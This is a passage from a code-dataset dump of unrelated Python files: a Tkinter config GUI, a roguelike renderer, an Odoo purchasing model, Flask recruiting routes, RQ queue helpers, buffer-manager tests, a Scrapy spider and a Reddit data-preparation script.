Size\", \"msg_size\")\n self.blankRow()\n self.configLabel(\"Command Period\", \"send_period\")\n self.configLabel(\"Command Count\", \"send_count\")\n self.configLabel(\"Wakeup Period\", \"wakeup_period\")\n self.configLabel(\"Mote Timeout\", \"mote_timeout\")\n self.msg = self.blankRow()\n bframe = Frame(self.frame)\n bframe.grid(row=self.row, columnspan=2)\n Button(bframe, text=\"Save\", command=self.save).grid(row=0, column=0)\n Button(bframe, text=\"Defaults\", command=self.defs).grid(row=0, column=1)\n 
Button(bframe, text=\"Cancel\", command=root.quit).grid(row=0, column=2)\n\n if config.use_ip:\n self.choose_ip()\n else:\n self.choose_ser()\n \nroot = Tk()\nGui(root)\nroot.mainloop()\n","sub_path":"tinyos-1.x/tools/java/net/tinyos/task/field/config-gui.py","file_name":"config-gui.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49484682","text":"import tdl\nfrom clubsandwich.geom import Point, Size\nfrom clubsandwich.ui import RectView\n\nfrom ui.camera import Camera\nfrom util.cursor import Cursor\n\n\nclass GameWindow(RectView):\n def __init__(self, game_context, **kwargs):\n super().__init__(fill=True, **kwargs)\n self.game_context = game_context\n player = self.game_context.player\n self.camera = Camera(location=player.location.copy(), screen_size=Size(120, 30))\n self.camera.character_focus = player\n\n def draw(self, ctx):\n player = self.game_context.player\n current_level = player.location.level\n self.camera.focus_on_game_object()\n self.set_tiles_background_color(ctx)\n\n player_x = player.location.local_x\n player_y = player.location.local_y\n\n def is_transparent_callback(x, y):\n if x <= 0 or y <= 0:\n return False\n return self.is_transparent(current_level, x, y)\n\n player.fov = tdl.map.quickFOV(player_x, player_y, is_transparent_callback, 'basic')\n\n # NB: Order in which things are render is important\n self.draw_map(player.fov, ctx)\n self.draw_items(player, ctx)\n self.draw_characters(player, ctx)\n self.draw_player(player, ctx)\n\n def draw_map(self, viewer_fov, ctx):\n current_level = self.camera.location.level\n\n for x, y in viewer_fov:\n if not x >= len(current_level.maze) and not y >= len(current_level.maze[x]):\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n ctx.printf(\n relative_point,\n current_level.maze[x][y].display.get_draw_info()\n )\n current_level.maze[x][y].is_explored = True\n\n def draw_items(self, player, ctx):\n current_level = self.camera.location.level\n for item in current_level.spawned_items:\n x, y = item.location.get_local_coords()\n if (x, y) in player.fov:\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n ctx.printf(\n relative_point,\n item.display.get_draw_info()\n )\n\n def draw_characters(self, player, ctx):\n # draw monsters\n current_level = self.camera.location.level\n for monster in current_level.spawned_monsters:\n x, y = monster.location.get_local_coords()\n if (x, y) in player.fov:\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n ctx.printf(\n relative_point,\n monster.display.get_draw_info()\n )\n\n def draw_player(self, player, ctx):\n relative_point = self.camera.transform(Point(*player.location.get_local_coords()))\n if relative_point is not None:\n ctx.printf(relative_point, player.display.get_draw_info())\n\n if isinstance(self.camera.character_focus, Cursor):\n cursor = self.camera.character_focus\n relative_point = self.camera.transform(Point(*cursor.location.get_local_coords()))\n if relative_point is not None:\n ctx.printf(relative_point, cursor.display.get_draw_info())\n\n def set_tiles_background_color(self, ctx):\n # TODO Instead of using a different color, we should darken whatever color it is.\n # TODO Allowing us to use many colors as walls and tiles to create levels with different looks.\n current_level = self.camera.location.level\n for y in range(current_level.height):\n for x in 
range(current_level.width):\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n tile = current_level.maze[x][y]\n wall = tile.block_sight\n ground = tile.is_ground\n\n if tile.is_explored:\n if wall:\n ctx.printf(relative_point, '[color=gray]#')\n elif ground:\n ctx.printf(relative_point, '[color=gray].')\n\n @staticmethod\n def is_transparent(current_level, x, y):\n \"\"\"\n Used by map.quickFOV to determine which tile fall within the players \"field of view\"\n \"\"\"\n try:\n # Pass on IndexErrors raised for when a player gets near the edge of the screen\n # and tile within the field of view fall out side the bounds of the maze.\n tile = current_level.maze[x][y]\n if tile.block_sight and tile.is_blocked:\n return False\n else:\n return True\n except IndexError:\n return False\n","sub_path":"scenes/game/windows/game_window.py","file_name":"game_window.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375120523","text":"# -*- coding: utf-8 -*-\n# © 2017 Pharmadus I.T.\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom openerp import models, fields, api\nfrom datetime import datetime\nimport time\n\n\nclass PurchasableProducts(models.TransientModel):\n _name = 'purchasable.products'\n _inherits = {'product.product': 'product_id'}\n _rec_name = 'product_id'\n\n request_id = fields.Integer()\n partner_id = fields.Many2one(comodel_name='res.partner')\n partner_ref = fields.Char(related='partner_id.ref', readonly=True)\n product_id = fields.Many2one(string='Product',\n comodel_name='product.product', required=True,\n ondelete='cascade', readonly=True)\n supplier_ref = fields.Char(string='Supplier reference', readonly=True)\n qty_current_year = fields.Float(digits=(16,2), string='Current year qty.')\n price_current_year = fields.Float(digits=(16,2), string='Current year amount')\n qty_last_year = fields.Float(digits=(16,2), string='Last year qty.')\n price_last_year = fields.Float(digits=(16,2), string='Last year amount')\n qty_year_before = fields.Float(digits=(16,2), string='Year before qty.')\n price_year_before = fields.Float(digits=(16,2), string='Year before amount')\n qty_other_years = fields.Float(digits=(16,2), string='Other years qty.')\n price_other_years = fields.Float(digits=(16,2), string='Other years amount')\n price_list_member = fields.Boolean(string='Price list member?')\n price_list_ids = fields.One2many(comodel_name='pricelist.partnerinfo',\n compute='_get_price_lists',\n readonly=True)\n invoice_line_ids = fields.One2many(comodel_name='account.invoice.line',\n compute='_get_invoices_lines',\n readonly=True)\n\n @api.one\n def _get_price_lists(self):\n self.price_list_ids = self.env['pricelist.partnerinfo'].search([\n ('suppinfo_id.product_tmpl_id', '=', self.product_id.product_tmpl_id.id)\n ])\n\n @api.one\n def _get_invoices_lines(self):\n self.invoice_line_ids = self.env['account.invoice.line'].search([\n ('product_id', '=', self.product_id.id),\n ('invoice_id.type', 'in', ('in_invoice', 'in_refund')),\n ('invoice_id.state', '!=', 'cancel'),\n ('invoice_id.date_invoice', '!=', False)\n ])\n\n @api.model\n def _get_products(self, partner_id):\n if not partner_id.supplier:\n return False\n\n inv_lines = self.env['account.invoice.line'].search([\n ('invoice_id.commercial_partner_id', '=', partner_id.id),\n ('invoice_id.type', 'in', ('in_invoice', 'in_refund')),\n ('invoice_id.state', '!=', 'cancel'),\n 
('invoice_id.date_invoice', '!=', False)\n ])\n\n price_lists = self.env['product.supplierinfo'].search([\n ('name', '=', partner_id.id)\n ])\n\n if not inv_lines:\n return False\n\n # Unique id for domain filtering\n request_id = int(round(time.time()))\n\n products = {}\n product_data = {\n 'request_id': request_id,\n 'partner_id': False,\n 'product_id': False,\n 'supplier_ref': '',\n 'qty_current_year': 0,\n 'price_current_year': 0,\n 'qty_last_year': 0,\n 'price_last_year': 0,\n 'qty_year_before': 0,\n 'price_year_before': 0,\n 'qty_other_years': 0,\n 'price_other_years': 0,\n 'price_list_member': False\n }\n\n current_year = datetime.now().year\n for ail in inv_lines:\n year_idx = current_year - \\\n fields.Date.from_string(ail.invoice_id.date_invoice).year\n prod_idx = ail.product_id.id\n if prod_idx not in products:\n products[prod_idx] = dict(product_data)\n products[prod_idx]['partner_id'] = partner_id.id\n products[prod_idx]['product_id'] = ail.product_id.id\n pl = price_lists.filtered(lambda r:\n r.product_tmpl_id ==\n ail.product_id.product_tmpl_id)\n products[prod_idx]['supplier_ref'] = pl.product_code if pl else ''\n\n sign = -1 if ail.invoice_id.type == 'in_refund' else 1\n\n if year_idx == 0:\n products[prod_idx]['qty_current_year'] += ail.quantity * sign\n products[prod_idx]['price_current_year'] += ail.price_subtotal * sign\n elif year_idx == 1:\n products[prod_idx]['qty_last_year'] += ail.quantity * sign\n products[prod_idx]['price_last_year'] += ail.price_subtotal * sign\n elif year_idx == 2:\n products[prod_idx]['qty_year_before'] += ail.quantity * sign\n products[prod_idx]['price_year_before'] += ail.price_subtotal * sign\n else:\n products[prod_idx]['qty_other_years'] += ail.quantity * sign\n products[prod_idx]['price_other_years'] += ail.price_subtotal * sign\n\n for pl in price_lists:\n if pl.product_tmpl_id.product_variant_count > 0:\n prod_idx = pl.product_tmpl_id.product_variant_ids[0].id\n if prod_idx not in products:\n products[prod_idx] = dict(product_data)\n products[prod_idx]['partner_id'] = partner_id.id\n products[prod_idx]['product_id'] = prod_idx\n products[prod_idx]['supplier_ref'] = pl.product_code\n products[prod_idx]['price_list_member'] = True\n\n for prod_idx in products:\n self.create(products[prod_idx])\n\n return request_id\n\n @api.multi\n def view_product_price_lists_and_invoices(self):\n view_id = self.env.ref('custom_views.purchasable_products_form_view').id\n\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': view_id,\n 'res_model': 'purchasable.products',\n 'res_id': self.id,\n 'target': 'new',\n 'context': self.env.context,\n }\n\n @api.model\n def search(self, args, offset=0, limit=None, order=None, count=False):\n if self.env.context.get('show_all_suppliers', False):\n # Unique id for domain filtering\n request_id = int(round(time.time()))\n\n self.env.cr.execute(\"\"\"\n insert into purchasable_products (request_id, partner_id, supplier_ref,\n product_id, create_uid, create_date, write_uid, write_date)\n select distinct\n {1:d} as request_id,\n suppliers.partner_id,\n rp.ref,\n suppliers.product_id,\n {0:d} as create_uid,\n current_date as create_date,\n {0:d} as write_uid,\n current_date as write_date \n from (\n select distinct\n ai.commercial_partner_id \"partner_id\",\n ail.product_id \"product_id\"\n from account_invoice ai\n join account_invoice_line ail on ail.invoice_id = ai.id\n join product_product pp on pp.id = ail.product_id and pp.active\n where ai.company_id = 1\n and 
ai.date_invoice is not null\n and ai.state != 'cancel'\n and ai.type in ('in_invoice', 'in_refund')\n \n union\n \n select distinct\n ps.name \"partner_id\",\n pp.id \"product_id\"\n from product_supplierinfo ps\n join product_product pp on pp.product_tmpl_id = ps.product_tmpl_id and pp.active\n where ps.company_id = 1\n and ps.active_supplier\n ) as suppliers\n join res_partner rp on rp.id = suppliers.partner_id and rp.active\n \"\"\".format(self.env.user.id, request_id))\n args.append(('request_id', '=', request_id))\n\n return super(PurchasableProducts, self).search(args, offset=offset,\n limit=limit, order=order,\n count=count)","sub_path":"project-addons/custom_views/models/purchasable_products.py","file_name":"purchasable_products.py","file_ext":"py","file_size_in_byte":8750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345710525","text":"import datetime\n\nfrom flask import render_template, url_for, flash, redirect, request\nfrom flask_login import current_user, login_user, logout_user\n\nfrom app import app, db\nfrom app.forms import LoginForm, InterviewForm, ManagerFeedbackForm\nfrom app.models import Employee, Candidate, Interview, Interviewer, Position\n\n# candidate forms\nfrom app.candidate_forms import CandidateRegistrationForm, CandidateLoginForm, CandidateApplicationDetails\n\n\n# recruiter routes\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n if current_user.role == \"Manager\":\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('manager_candidates.html', candidates=candidates)\n else:\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('all_candidates.html', candidates=candidates)\n form = LoginForm()\n if request.method == 'POST' and form.validate_on_submit():\n employee = Employee.query.filter_by(email=form.email.data).first()\n if employee and employee.password == form.password.data:\n login_user(employee)\n if current_user.role == \"Manager\":\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('manager_candidates.html', candidates=candidates)\n else:\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('all_candidates.html', candidates=candidates)\n else:\n flash('Login Unsuccessful. 
Please check email and password', 'danger')\n    return render_template('login.html', title='Login', form=form)\n\n\n@app.route('/candidate/<candidate_id_str>/job/<job_id_str>/interview/new', methods=['GET', 'POST'])\ndef createNewInterview(candidate_id_str, job_id_str):\n    candidate = Candidate.query.filter_by(id=candidate_id_str).first()\n    job = Position.query.filter_by(id=job_id_str).first()\n    interviewers = Employee.query.filter_by(role='Interviewer').all()\n    form = InterviewForm()\n    if request.method == 'POST' and form.validate_on_submit():\n        interview = Interview()\n        print(request.form.get('interviewer'))\n        interviewer_id = request.form.get('interviewer')\n        interview.interviewer_id = interviewer_id\n        interview.recruiter_id = current_user.id\n        db.session.add(interview)\n        db.session.commit()\n        return redirect('/interview/' + str(interview.id) + '/set')\n    return render_template('new_interview.html', title='Schedule Interview', form=form, interviewers=interviewers,\n                           candidate=candidate, job=job)\n\n\n@app.route('/interview/<interview_id>/set', methods=['GET', 'POST'])\ndef setInterviewTime(interview_id):\n    curr_interview = Interview.query.filter_by(id=interview_id).first()\n    print(curr_interview.interviewer_id)\n    interviewer = Interviewer.query.filter_by(id=curr_interview.interviewer.id).first()\n    interviews_by = Interview.query.filter_by(interviewer_id=interviewer.id).all()\n    # assumption: assume hours start at 9 and end at 6, each interview can only be an hour long\n    possible_start_times = time_population()\n    for interview in interviews_by:\n        curr_time = interview.start_time\n        if curr_time in possible_start_times:\n            possible_start_times.remove(curr_time)\n\n    print(possible_start_times)\n    return render_template('set_time_interview.html')\n\n\n@app.route(\"/logout\")\ndef logout():\n    logout_user()\n    return redirect(url_for('login'))\n\n\n# manager routes\n\n@app.route(\"/final_selected_candidates\")\ndef final_selected_candidates():\n    candidates = Candidate.query.order_by(Candidate.id)\n    return render_template('final_selected_candidates.html', candidates=candidates)\n\n\n@app.route('/info/<candidate_id>')\ndef info(candidate_id):\n    cur_candidate = Candidate.query.get_or_404(candidate_id)\n    return render_template('candidate_info.html', cur_candidate=cur_candidate)\n\n\n@app.route('/candidate_interviews/<candidate_id>')\ndef candidate_interviews(candidate_id):\n    interviews = Interview.query.filter_by(candidate_id=candidate_id).order_by(Interview.round)\n    cur_candidate = Candidate.query.get_or_404(candidate_id)\n    return render_template('interview_info.html', interviews=interviews, cur_candidate=cur_candidate)\n\n\n@app.route('/manager_feedback/<candidate_id>')\ndef manager_feedback(candidate_id):\n    form = ManagerFeedbackForm()\n    candidate = Candidate.query.get_or_404(candidate_id)\n    return render_template('manager_feedback.html', candidate=candidate, form=form)\n\n# interviewer routes\n\n# candidate routes\n\n\n# candidate application link\n@app.route('/application-form', methods=['GET', 'POST'])\ndef application():\n    form = CandidateApplicationDetails()\n    return render_template('candidate_application.html', title='application', form=form)\n\n\n# candidate login link\n@app.route('/candidate-login', methods=['GET', 'POST'])\ndef candidateLogin():\n    form = CandidateLoginForm()\n    if form.validate_on_submit():\n        return redirect(url_for('application'))\n    return render_template('candidate_login.html', title='candidateLogin', form=form)\n\n\n# candidate Registration link\n@app.route('/candidate-registration', methods=['GET', 'POST'])\ndef candidateRegister():\n    
form = CandidateRegistrationForm()\n if request.method == 'POST':\n return redirect(url_for('candidateLogin'))\n return render_template('candidate_registration.html', title='candidateRegister', form=form)\n\n\ndef time_population():\n list_times = []\n time = 9\n done = False\n while not done:\n list_times.append(datetime.time(time, 0, 0))\n time += 1\n if time == 13:\n time = 1\n if time == 6:\n break\n return list_times\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384437374","text":"import requests\nfrom decouple import config\n\n\ndef from_google(text, source, target):\n if source == target:\n return text\n\n qs = {\n 'key': config('GOOGLE_API_KEY', cast=str),\n 'source': source,\n 'target': target,\n 'format': 'text',\n 'q': text,\n }\n api_url = 'https://translation.googleapis.com/language/translate/v2'\n\n response = requests.post(api_url, params=qs)\n\n data = response.json()\n if response.ok:\n return data['data']['translations'][0]['translatedText']\n else:\n print(\"Error\")\n print(data)\n raise Exception(data)\n","sub_path":"babel/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232334869","text":"# coding=utf-8\nfrom django.contrib import admin\nfrom .models import Author, Book, Publisher\n# Register your models here.\n\n# admin.site.register(Publisher)\n# admin.site.register(Author)\n# admin.site.register(Book)\n\nclass PubAdmin(admin.ModelAdmin):\n list_display = ('name', 'address', 'website')\n search_fields = ('name',)\n list_filter = ('city', 'state_province')\nadmin.site.register(Publisher, PubAdmin)\n\nclass AuthorAdmin(admin.ModelAdmin):\n list_display = ('first_name', 'last_name', 'email')\n search_fields = ('first_name',)\nadmin.site.register(Author, AuthorAdmin)\n\nclass BookAdmin(admin.ModelAdmin):\n list_display = ('title', 'publisher', 'publication_date')\n search_fields = ('title', 'author', 'publisher', 'publication_date')\n list_filter = ('author', 'publisher', 'publication_date')\n filter_horizontal = ('author',)\nadmin.site.register(Book, BookAdmin)","sub_path":"hello/books/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585063615","text":"num = int(input(\"Input an int: \")) # Do not change this line\n\n# Fill in the missing code below\ncounter=1\ntala=1\nwhile counter<=num:\n print(tala)\n tala+=2\n counter+=1\n \n","sub_path":"first n odd numbers.py","file_name":"first n odd numbers.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610858642","text":"# coding: utf-8\nimport os\nimport sys\nfrom redis import Redis\nfrom rq import Queue\n\nPROJECT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append(PROJECT_PATH)\n\nfrom opac_proc.web import config\n\n\nclass Singleton(object):\n _instances = {}\n\n def __new__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__new__(cls, *args, **kwargs)\n return cls._instances[cls]\n\n\nclass RQueues(Singleton):\n redis_conn = None\n q_names = {\n 'extract': {\n 'collection': 'qex_collections',\n 'journal': 
'qex_journals',\n            'issue': 'qex_issues',\n            'article': 'qex_articles',\n            'press_release': 'qex_press_releases',\n        },\n        'transform': {\n            'collection': 'qtr_collections',\n            'journal': 'qtr_journals',\n            'issue': 'qtr_issues',\n            'article': 'qtr_article',\n            'press_release': 'qtr_press_releases',\n        },\n        'load': {\n            'collection': 'qlo_collections',\n            'journal': 'qlo_journals',\n            'issue': 'qlo_issues',\n            'article': 'qlo_articles',\n            'press_release': 'qlo_press_releases',\n        }\n    }\n\n    queues = {\n        'extract': {\n            'collection': None,\n            'journal': None,\n            'issue': None,\n            'article': None,\n            'press_release': None,\n        },\n        'transform': {\n            'collection': None,\n            'journal': None,\n            'issue': None,\n            'article': None,\n            'press_release': None,\n        },\n        'load': {\n            'collection': None,\n            'journal': None,\n            'issue': None,\n            'article': None,\n            'press_release': None,\n        }\n    }\n\n    def __init__(self, redis_conn=None):\n        if redis_conn:\n            self.redis_conn = redis_conn\n        else:\n            self.redis_conn = Redis(**config.REDIS_SETTINGS)\n\n    def create_queue(self, stage, model):\n        queue = self.queues[stage][model]\n        if queue is None:\n            q_name = self.q_names[stage][model]\n            queue = Queue(q_name, connection=self.redis_conn)\n            self.queues[stage][model] = queue\n        return queue\n\n    def create_queues_for_stage(self, stage):\n        for model in self.q_names[stage].keys():\n            q = self.queues[stage][model]\n            if q is None:\n                self.queues[stage][model] = self.create_queue(stage, model)\n\n    def get_queue(self, stage, model):\n        queue = self.queues[stage][model]\n        if queue is None:\n            queue = self.create_queue(stage, model)\n        return queue\n\n    def enqueue(self, stage, model, task, *args, **kwargs):\n        queue = self.get_queue(stage, model)\n        return queue.enqueue(task, args=args, kwargs=kwargs, timeout=2000)\n","sub_path":"opac_proc/datastore/redis_queues.py","file_name":"redis_queues.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633734156","text":"import unittest\nimport os\nimport time\nfrom buffer_manager import pin, Block, BufferManager\n\n\nclass TestBlock(unittest.TestCase):\n    def setUp(self):\n        with open('foo', 'wb') as file:\n            file.write(b'Hello World')\n\n    def tearDown(self):\n        os.remove('foo')\n\n    def test_block(self):\n        block = Block(5, 'foo', 0)\n        self.assertEqual(block.read(), b'Hello')  # test read\n        block.write(b'abcde')\n        self.assertEqual(block.read(), b'abcde')  # test write\n        self.assertTrue(block.dirty)  # test that write sets dirty bit\n        block.flush()\n        self.assertFalse(block.dirty)  # test that flush resets dirty bit\n        with open('foo', 'rb') as f:\n            self.assertEqual(f.read(), b'abcde World')  # test flush writes back to file\n        block.pin()\n        self.assertEqual(block.pin_count, 1)  # test pin increases pin count\n        # with self.assertRaises(RuntimeError):  # test pinned block cannot be freed\n        #     block.flush()\n        block.unpin()\n        self.assertEqual(block.pin_count, 0)  # test that unpin increases pin count\n        block.flush()\n\n    def test_partial_read(self):\n        block = Block(5, 'foo', 2)  # test partial read\n        self.assertEqual(block.effective_bytes, 1)\n        self.assertEqual(block.read(), b'd')\n        block.write(b'D')\n        self.assertEqual(block.read(), b'D')\n        block.flush()\n        with open('foo', 'rb') as file:\n            self.assertEqual(file.read(), b'Hello WorlD')\n\n    def test_expanding_write(self):\n        block = Block(5, 'foo', 2)\n        block.write(b'D12')\n        self.assertEqual(block.effective_bytes, 3)\n        block.flush()\n        with open('foo', 'rb') as file:\n            self.assertEqual(file.read(), b'Hello 
WorlD12')\n\n    def test_overflow_write(self):\n        block = Block(5, 'foo', 2)\n        with self.assertRaises(RuntimeError):\n            block.write(b'whos your daddy')\n        self.assertEqual(block.read(), b'd')  # test the data is not corrupted\n        self.assertEqual(block.effective_bytes, 1)\n        block.write(b'whos your daddy', trunc=True)\n        self.assertEqual(block.read(), b'whos ')\n        self.assertEqual(block.effective_bytes, 5)\n        self.assertEqual(len(block._memory), 5)\n        block.flush()\n        with open('foo', 'rb') as file:\n            self.assertEqual(file.read(), b'Hello Worlwhos ')\n\n\nclass TestContextManager(unittest.TestCase):\n    def setUp(self):\n        with open('foo', 'wb') as file:\n            file.write(b'Hello World')\n\n    def tearDown(self):\n        os.remove('foo')\n\n    def test_pin(self):\n        block = Block(5, 'foo', 0)\n        with pin(block):\n            self.assertEqual(block.pin_count, 1)\n            self.assertEqual(block.read(), b'Hello')\n        self.assertEqual(block.pin_count, 0)\n\n\nclass TestBufferManager(unittest.TestCase):\n    def setUp(self):\n        with open('foo', 'wb') as file:\n            file.write(b'Hello World')\n        BufferManager.block_size = 5\n        BufferManager.total_blocks = 2\n\n    def tearDown(self):\n        os.remove('foo')\n        BufferManager.block_size = 4096\n        BufferManager.total_blocks = 1024\n\n    def test_buffer_manager(self):\n        manager = BufferManager()\n        a = manager.get_file_block('foo', 0)\n        a.pin()\n        self.assertEqual(a.read(), b'Hello')\n        b = manager.get_file_block('./foo', 0)\n        self.assertTrue(a is b)  # test cache hit\n        a.write(b'hello')\n        # a is not flushed\n\n        b = manager.get_file_block('foo', 1)\n        b.pin()\n        time.sleep(0.5)\n        self.assertEqual(b.read(), b' Worl')\n        with self.assertRaises(RuntimeError):\n            c = manager.get_file_block('foo', 2)  # test buffer run out of space\n        a.unpin()\n        b.unpin()\n        c = manager.get_file_block('foo', 2)  # test lru swap\n        self.assertFalse((os.path.abspath('foo'), 0) in manager._blocks.keys())  # a should be swapped out\n        self.assertTrue((os.path.abspath('foo'), 1) in manager._blocks.keys())  # b should remain in the buffer\n        with open('foo', 'rb') as file:\n            self.assertEqual(file.read(), b'hello World')  # test the swapped out block is flushed\n\n    def test_singleton(self):\n        manager_a = BufferManager()\n        manager_b = BufferManager()\n        self.assertTrue(manager_a is manager_b)\n\n    def test_import_singleton(self):\n        import tests.buffer_import_a, tests.buffer_import_b\n        self.assertTrue(tests.buffer_import_a.manager is tests.buffer_import_b.manager)\n\n    def test_detach(self):\n        manager = BufferManager()\n        manager.get_file_block('foo', 0)\n        manager.detach_from_file('foo')\n        self.assertFalse(manager._blocks)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_buffer_manager.py","file_name":"test_buffer_manager.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354686165","text":"# -*- coding:utf-8 -*-\nimport scrapy\nfrom artile_url.items import CbItem\n\n'''\nwe can only get 100 pages results\n'''\n\n\nclass bidding(scrapy.Spider):\n    name = 'bibenet'\n    allowed_domains = ['bibenet.com']\n    url = 'https://www.bibenet.com/search'\n    fd = {\n        'messageLikes': '',\n        'pageNum': '1'\n    }\n    kw = ''\n    totalpage = -1\n\n    def start_requests(self):\n        '''\n        get keyword and create first request url\n        :return:\n        '''\n        self.kw = getattr(self, 'kw', None)\n        if not self.kw:\n            print(\"please enter key word, like -a kw=yourkeyword\")\n            return\n        self.fd['messageLikes'] = self.kw\n        yield scrapy.FormRequest(url=self.url, formdata=self.fd, callback=self.parse)\n\n    
def parse(self, response):\n '''\n parse url from response and get next page\n :param response:\n :return:\n '''\n #get urls\n urls = response.xpath(\"//tr//a/@href\")\n for u in urls:\n item = CbItem()\n item['url'] = u.extract()\n print(item)\n yield item\n\n #get nextpage\n pagenum = int(response.xpath(\"//input[@name='pageNum']/@value\").extract()[0])\n if self.totalpage == -1:\n self.totalpage = int(response.xpath(\"//input[@name='totalPage']/@value\").extract()[0])\n # print(pagenum, self.totalpage)\n if pagenum < self.totalpage and pagenum <= 100:\n self.fd['pageNum'] = str(pagenum+1)\n # print(self.fd)\n yield scrapy.FormRequest(url=self.url, formdata=self.fd, callback=self.parse)\n else:\n return\n","sub_path":"src/crawl/artile_url/artile_url/spiders/bibenet.py","file_name":"bibenet.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538140993","text":"import pandas as pd\nimport numpy as np\nfrom pathlib import Path\nfrom transformers import AutoTokenizer\nimport argparse\nimport json\nimport glob\nimport gzip\nimport random\nimport itertools\nfrom multiprocessing import Pool\n\nDATA_PATH = Path('..') / 'data'\nPROCESSED_PATH = DATA_PATH / 'filtered'\nTRIPLET_PATH = DATA_PATH / 'json' / 'triplet'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--n-cores', type=int, default=10,\n help='Number of parallel calls to main loop')\nparser.add_argument('--seed', type=int, default=0,\n help='Seed for random call')\nparser.add_argument('--n-examples', type=int, default=1,\n help='Number of negative/positive examples')\nparser.add_argument('--batch-size', type=int, default=10000,\n help='Number of authors per file')\nparser.add_argument('--dataset-name', type=str, default=None,\n help='Dataset name for output path')\n\ndef _shuffle_by_author(df):\n groups = [df for _,df in df.groupby('author')]\n random.shuffle(groups)\n shuffled = pd.concat(groups).reset_index(drop=True)\n return shuffled\n\n\ndef pick_and_drop_examples(df, n):\n ''' Picks examples, pops them from main df, returns them separate df \n Args:\n df (pd.DataFrame): global dataframe\n n (int): number of examples per user \n '''\n idx = df.groupby('author')\\\n .apply(lambda x: np.random.choice(x.index, n, \n replace=False)).values\n idx = list(itertools.chain(*idx))\n ex_df = _shuffle_by_author(df.loc[idx,:])\n df.drop(idx, axis=0, inplace=True)\n return ex_df, df\n\n\ndef _make_user_dict(df, pos_df, neg_df, batch_nr, batch_size):\n ''' Returns dictionary with info on user '''\n alist = []\n for u_idx, u in enumerate(df.author.unique()):\n author_id = (batch_nr - 1) * batch_size + (u_idx + 1)\n anchor = df[df['author']==u]\n neg = neg_df[neg_df['target_author']==u]\n pos = pos_df[pos_df['author']==u]\n adict = {'author': u,\n 'author_id': author_id,\n 'anchor': anchor['selftext'].tolist(),\n 'positive': pos['selftext'].tolist(),\n 'negative': neg['selftext'].tolist(),\n 'n_anchor': anchor.shape[0],\n 'n_positive': pos.shape[0],\n 'n_negative': neg.shape[0],\n 'anchor_subreddits': anchor['subreddit'].tolist(),\n 'positive_subreddits': pos['subreddit'].tolist(),\n 'negative_subreddits': neg['subreddit'].tolist(),\n 'negative_authors': neg['author'].tolist(),\n 'pos_subreddit_overlap': len(set(pos['subreddit']) \\\n & set(anchor['subreddit'])) / \\\n pos.shape[0],\n 'neg_subreddit_overlap': len(set(neg['subreddit']) \\\n & set(anchor['subreddit'])) / \\\n neg.shape[0]}\n alist.append(adict) \n return alist\n\n\n# Main 
function\ndef make_triplets(f, outpath, seed=0, n_examples=1, \n                  batch_size=10000):\n    ''' For each user, selects which posts are used as anchor,\n        positive example, and negative example. Stores this info \n        in dataframes (splits into several chunks for ease of \n        processing and storage reasons) and in a json file\n    Args:\n        seed (int): seed for np.random.seed call\n    '''\n    print(f'Reading {f}...')\n    df = pd.read_csv(f, sep='\\t', compression='gzip')\n    count_df = df.groupby('author')['selftext'].count().reset_index()\n    count_df = count_df.rename({'selftext':'n_posts'}, axis=1)\n    df = df.merge(count_df)\n    df = df[df['n_posts']>=n_examples*3]\n    df['selftext'] = df['selftext'].str.strip()\n\n    # Get examples\n    np.random.seed(seed)\n    neg_df, df = pick_and_drop_examples(df, n=n_examples)\n    pos_df, df = pick_and_drop_examples(df, n=n_examples)\n    attempt = 0\n\n    # Match users and examples\n    while True:\n        attempt += 1\n        print(f'\\tMatch users and examples, attempt {attempt}...')\n        alist = df.author.unique().tolist()\n        np.random.shuffle(alist)\n        alist = [a for a in alist for _ in range(n_examples)]\n        neg_df['target_author'] = alist  # store the pairing before testing it, otherwise the accepted shuffle is never saved\n        if all(alist != neg_df['author']):\n            break\n\n    # Concatenate and save as json\n    ofile_id = f.split('/')[-1].split('.')[0]\n    batch_nr = int(ofile_id.split('_')[1])\n    ofile_json = outpath / f'{ofile_id}.json.gz'\n    d = _make_user_dict(df, pos_df, neg_df, batch_nr, batch_size)\n    with gzip.open(ofile_json, 'w') as 